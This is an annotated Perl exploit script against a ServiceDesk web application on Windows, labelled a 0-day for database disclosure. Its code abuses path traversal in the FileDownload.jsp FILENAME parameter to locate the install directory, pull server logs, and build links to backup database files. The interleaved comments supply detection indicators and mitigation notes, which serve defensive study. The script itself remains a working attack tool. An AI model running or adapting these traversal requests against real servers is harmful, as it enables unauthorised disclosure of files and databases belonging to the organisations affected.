- #!/usr/bin/perl
- use LWP::UserAgent;
- use File::stat;
# Banner text, printed once at startup. The bracketed lines are the author's
# own labels for the script (database disclosure, ServiceDesk on Windows).
- $ptxt="
- #################################################
- # _____ _ ____ _
- #| __|___ ___ _ _|_|___ ___| \ ___ ___| |_
- #|__ | -_| _| | | | _| -_| | | -_|_ -| '_|
- #|_____|___|_| \_/|_|___|___|____/|___|___|_,_|
- #
- #################################################
- [0-day] [Database disclosure]
- [desc: Exploit for ServiceDesk v *.* OS: Windows]
- ";
- print $ptxt;
# $ua is a package global (the file has no `use strict` and nothing here is
# declared with `my`); the three subs below call $ua->get directly instead of
# receiving it as an argument. No agent string is set, so requests carry
# LWP's default User-Agent (libwww-perl/<version>), which is worth matching
# in web-server and proxy logs.
- $ua=LWP::UserAgent->new();
# Base URL and the single endpoint every request in this script goes to.
# Each request is a GET to /workorder/FileDownload.jsp whose FILENAME
# parameter begins with a long run of "..\" segments (path traversal).
# Detection: alert on this path with "..\" in FILENAME -- presumably
# percent-encoded as %5C on the wire; confirm against a capture.
# Mitigation: the handler has to canonicalise FILENAME and refuse anything
# that resolves outside its intended download directory.
- $url="http://127.0.0.1";
- $path="/workorder/FileDownload.jsp";
# Stage 1: work out which directory the product is installed in.
# NOTE(review): getInstallPathWin returns 0, not "", when nothing is found,
# so the `ne ""` test is still true in that case and the else branch below
# is not reached that way.
- $installPath=&getInstallPathWin($url,$path);
- if ($installPath ne "") {
# Stage 2: read the server logs and derive "directory --- filename" entries
# for backup files. The sub prompts on STDIN, so this step is interactive.
- @backups=&getServerOutLogs($url,$path,$installPath);
- } else {
- print "Install path not found :(\n";
- exit();
- }
# Stage 3: one call per candidate entry. As written, downloadBackups does not
# fetch anything; it only appends a link to db_backups.html.
- if (scalar(@backups)>0) {
- print "hehe.. We got paths to backup files..\n If they are on the same drive and exists - we will own their world!!\n";
- foreach $backLine (@backups) {
# This split only feeds the commented-out print below; downloadBackups
# splits $backLine again itself.
- @backInfo=split(/ --- /,$backLine);
- #print "Trying to download $backInfo[1] from $backInfo[0]...\n";
- &downloadBackups($url,$path,$backLine);
- }
- }
# Remove the baseline response file that getServerOutLogs saved as "bad".
- unlink("bad");
- print "Dude, check out \'db_backups.html\'\n";
# downloadBackups($url, $path, $backLine)
#   $url, $path - base URL and endpoint path, concatenated as-is.
#   $backLine   - "directory --- filename", split on " --- ".
# Builds the traversal URL for one candidate backup file and appends an HTML
# link for it to db_backups.html in the current working directory. The code
# that would fetch and save the file is commented out, so nothing is
# downloaded here. No explicit return value.
- sub downloadBackups {
- my ($url,$path,$backLine) = @_;
# @backInfo and $backupUrl are package globals, not lexicals.
- @backInfo=split(/ --- /,$backLine);
# Same request shape as everywhere else in the script: fixed query string,
# then a run of "..\" segments, then directory and file name appended
# without any encoding of their own.
- $backupUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\$backInfo[0]$backInfo[1]";
- #$br=$ua->get($backupUrl);
- #if ($br->is_success) {
- # open(A,">$backInfo[1]");
- # print A $br->content;
- # close(A);
- #}
# Two-argument open in append mode on the bareword handle A; the result of
# open is not checked, so a failure here is silent.
- open(A,">>db_backups.html");
# Both values go into the href and the link text without HTML or URL
# escaping. $backInfo[0] is the directory typed at the prompt in
# getServerOutLogs; treat the generated file as untrusted when opening it.
- print A "<a href='$backupUrl'>$backInfo[1]</a><br>\n";
- close(A);
- }
# getServerOutLogs($url, $path, $installPath)
#   $installPath - install directory relative to the drive root, with a
#                  trailing backslash (as returned by getInstallPathWin).
# Requests server\default\log\serverout0.txt .. serverout10.txt through the
# FileDownload.jsp FILENAME parameter, extracts the build number and any
# logged BACKUPDIR entries, then asks the operator on STDIN for the directory
# of each backup. Returns the global @backupFiles: two "dir --- filename"
# strings (database and fullbackup variants) per answered prompt. Calls
# exit() when no BACKUPDIR line was found.
#
# Defender notes: the log line parsed here records the backup directory and
# time, and the backup file name is then derived from build number plus
# timestamp. The script itself states the backups must be on the same drive
# as the application, so keeping backups on a separate volume, with file
# permissions that exclude the web service account, removes what this step
# depends on. The literal "serverout11111111111" in a FILENAME parameter is
# a distinctive indicator of this script in request logs.
- sub getServerOutLogs {
- my ($url,$path,$installPath) = @_;
# Baseline request for a log name that should not exist; the response is
# saved as "bad" so later responses can be compared against it by size.
# ${i} is the package global $i, not the loop counter below (this line runs
# before that loop), so it holds whatever earlier code left in it.
- $badUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout11111111111${i}.txt";
- $br=$ua->get($badUrl);
- if ($br->is_success) {
- open(A,">bad");
- print A $br->content;
- close(A);
- }
# Fetch serverout0.txt .. serverout10.txt and save each success response as
# "<i>.txt" in the current working directory.
- for ($i=0;$i<=10;$i++) {
- $logUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout${i}.txt";
- $br=$ua->get($logUrl);
- if ($br->is_success) {
- open(A,">${i}.txt");
- print A $br->content;
- close(A);
# A response the same size as the baseline is treated as "file not there"
# and deleted; a different size is kept. This uses File::stat's object
# interface. NOTE(review): if "bad" was never written, stat("bad") has
# nothing to return and the ->size call fails.
- if (stat("bad")->size!=stat("${i}.txt")->size) {
- } else {
- unlink("${i}.txt");
- }
- }
- }
# Parse whichever log copies survived the size check, then delete them.
- for ($i=0;$i<=10;$i++) {
- if (-e "${i}.txt") {
- open(A,"${i}.txt");
- @log=<A>;
- close(A);
- foreach $line (@log) {
# Build number: the digits after ": Build number...: " and before "|".
# $sdBuild is a global and only the first match is kept.
- if ($line=~/: Build number(.*): ([0-9]+)\|/) {
- $tBuild=$2;
- if ($sdBuild eq "") {
- $sdBuild=$tBuild;
- }
- }
# Backup record: captures 1-4 are the four colon-separated numbers in the
# first bracket, 5-7 the three dash-separated numbers in the second, and 9
# the text between "BACKUPDIR=" and ", ATTACHMENT=". The pushed entry is
# "<BACKUPDIR> --- <file name template>", with XBUILDX filled in later.
# @backups here is the same global the caller assigns this sub's return
# value to.
- if ($line=~/\[([0-9]+):([0-9]+):([0-9]+):([0-9]+)\]\|\[([0-9]+)-([0-9]+)-([0-9]+)\]\|\[SYSOUT\](.*)BACKUPDIR=(.*), ATTACHMENT=/) {
- push(@backups,"$9 --- backup_servicedesk_XBUILDX_database_${5}_${6}_${7}_${1}_${2}.data");
- }
- }
- unlink("${i}.txt");
- }
- }
- if (scalar(@backups)>0) {
- print "Man, you are realy lucky! We found some info about ServiceDesk backups..\nBUT, I need your help now, hehe\nLet's construct directories!\np.s. type without drive letter, like \\backup\\\n";
- } else {
- print "Bad luck.. Check your karma, seriously..Where is my fucking latte!?!?\np.s. No info about backups was found :(";
- exit();
- }
# For each entry: substitute the build number into the file name template
# (this edits the @backups element in place through the loop alias), show
# the logged directory, and read a replacement directory from STDIN. An
# empty answer skips the entry.
- foreach $mb (@backups) {
- $mb=~s/XBUILDX/$sdBuild/gi;
- @dir=split(/ --- /,$mb);
# $dir[0] is text taken from the downloaded server log, printed as-is.
- print "Trash Dir: $dir[0]\n";
- print "Right Dir: ";
- chomp($rDir=<STDIN>);
- if ($rDir ne "") {
# Second candidate name: same file name with "database" replaced by
# "fullbackup".
- $fullDB=$dir[1];
- $fullDB=~s/database/fullbackup/gi;
- push(@backupFiles,"$rDir --- $dir[1]");
- push(@backupFiles,"$rDir --- $fullDB");
- }
- }
- return @backupFiles;
- }
# getInstallPathWin($url, $path)
# Guesses the install directory by requesting a few known file names under
# each candidate directory through the FileDownload.jsp FILENAME parameter
# and comparing response sizes with the response for a file name that should
# not exist. Returns the matching entry of @paths, or 0 when none matched.
#
# Defender notes: the literal probe name "dashgjifyq8412348fhsjfghjqw.txt"
# in a FILENAME parameter is a distinctive indicator of this script. The
# size comparison suggests the endpoint answers with a success status and a
# fixed body for missing files -- inferred from this heuristic, not shown
# on the page.
- sub getInstallPathWin {
- my ($url,$path) = @_;
# Common prefix for every probe: fixed query string plus the "..\" run.
- $url1="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\";
# Candidate install directories, relative to the drive root.
- @paths=("ServiceDesk\\","ManageEngine\\ServiceDesk\\");
# Index 0 is the baseline (a name not expected to exist); indexes 1-4 are
# files the script expects to find in a real install.
- @checkFiles=("dashgjifyq8412348fhsjfghjqw.txt","COPYRIGHT","logs\\configport.txt","bin\\run.bat","server\\default\\log\\boot.log");
# Request every (path, file) pair and save each success response to a file
# named "<i><k>" in the current working directory. $i and $k are globals.
- $i=0;
- foreach $p (@paths) {
- $k=0;
- foreach $f (@checkFiles) {
- $checkUrl="${url1}${p}${f}";
- $br=$ua->get($checkUrl);
- if ($br->is_success) {
- open(A,">${i}${k}");
- print A $br->content;
- close(A);
- }
- $k++;
- }
- $i++;
- }
# Score each candidate path: $ok counts saved responses whose size differs
# from the baseline's.
- for ($i=0;$i<scalar(@paths);$i++) {
- $ok=0;
- for ($k=0;$k<scalar(@checkFiles);$k++) {
- if (-e "${i}${k}") {
- if ($k==0) {
# $incorrectSize is only set when the baseline file exists and is not
# reset between paths, so a missing baseline reuses the previous value
# (or an undefined one on the first path).
- $incorrectSize=stat("${i}${k}")->size;
- } else {
- if (stat("${i}${k}")->size!=$incorrectSize) {
- $ok++;
- }
- }
- }
- }
# 4 = every check file differed from the baseline, 3 and 2 are accepted with
# weaker wording, 1 is ignored. A later path that scores overwrites $ret.
- if ($ok>0) {
- if ($ok==4) {
- print "You are lucky! \nServiceDesk installed to: $paths[$i]\n";
- $ret=$paths[$i];
- } elsif ($ok>2) {
- print "I think ServiceDesk installed to: $paths[$i]\n";
- $ret=$paths[$i];
- } elsif ($ok>1) {
- print "You are lucky if ServiceDesk installed to: $paths[$i]\n";
- $ret=$paths[$i];
- }
- }
- }
# Delete every temporary "<i><k>" file, whether or not it was created.
- for ($i=0;$i<scalar(@paths);$i++) {
- for ($k=0;$k<scalar(@checkFiles);$k++) {
- unlink("${i}${k}");
- }
- }
# Failure is reported as 0, while the caller at the top of the script tests
# the result against "".
- if ($ret eq "") {
- print "Bad luck man :\/\n";
- $ret=0;
- }
- return $ret;
- }